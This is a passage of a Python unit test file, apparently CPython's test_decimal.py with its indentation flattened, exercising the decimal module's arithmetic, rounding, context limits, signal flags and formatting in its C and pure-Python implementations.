self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000026')
